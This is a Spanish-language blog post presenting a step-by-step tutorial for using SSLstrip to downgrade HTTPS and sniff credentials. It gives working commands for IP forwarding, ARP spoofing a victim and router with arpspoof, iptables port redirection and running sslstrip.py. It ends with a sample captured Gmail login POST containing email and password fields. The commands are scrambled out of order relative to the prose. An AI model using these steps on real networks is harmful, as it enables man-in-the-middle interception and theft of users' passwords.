HTTPS se considera uno de los protocolos de envío de información por web más seguros, sin embargo y como se suele decir, no es oro todo lo que reluce. En este post voy a presentar una herramienta, SSLstrip, que permite justamente hacer eso, destripar una conexión HTTPS y conseguir ver el contenido transmitido en texto plano.
SSLstrip permite sniffar usuarios y contraseñas transmitidas por HTTPS de forma sencilla. Para realizar el ataque únicamente llega con usar una técnica man-in-the-middle. El equipo intermedio observará todo el tráfico en texto plano.
¿Cómo?
Ejemplo
- Descargar SSLstrip.
- Realizar el ataque MITM.
- Observar el tráfico HTTPS de interés.
Todos los comandos serán ejecutados desde la máquina con IP192.168.1.2.
La última versión de SSLstrip es la 0.7. Para descargarla:
Lo descompimimos y tenemos una nueva carpeta, sslstrip-0.7. Accedemos a ella y desde ahí seguimos con todo el proceso.
Ponemos ahora nuestra máquina como router intermedio para el ataque MITM y así permitir el enroutamiento de paquetes.tar zxvf sslstrip-0.7.tar.gz
cd sslstrip-0.7/
Ahora realizamos el ataque MITM propiamente dicho, para ello usaremos la herramienta arpspoof, con el interfaz de escucha, la IP de la víctima y la IP del router.echo "1" > /proc/sys/net/ipv4/ip_forward
Con IPtables cambiamos la redirección de puertosarpspoof -i eth0 -t 192.168.1.33 192.168.1.1
Llegados a este punto, únicamente queda ejecutar SSLstrip para así poder comenzar a capturar datos. Para ello, simplemente le pasamos el fichero de captura.iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Si deseamos ver en tiempo real lo que está capturando, podemos emplear alguna de las utilidades en línea de comandos para hacerlo, como tail../sslstrip.py -w captura.cap
Más info en: http://blackploit.blogspot.com/2010/03/tutorial-sslstrip.htmltail -f captura.cap
2010-09-28 01:35:046,739 SECURE POST Data (www.google.com):
ltmpl=default<mplcache=2&continue=http%3A%2F%2Fm ail.google.com%2Fmail%2F%3F&service=mail&rm=false& dsh=6669774865561864179<mpl=default<mpl=defaul t&scc=1&timeStmp=&secTok=&GALX=dPSLG5jykg8&a
mp;Email=user_prueba&Passwd=mi_passwd&rmShown=1&si gnIn=Acceder&asts=
Marcadores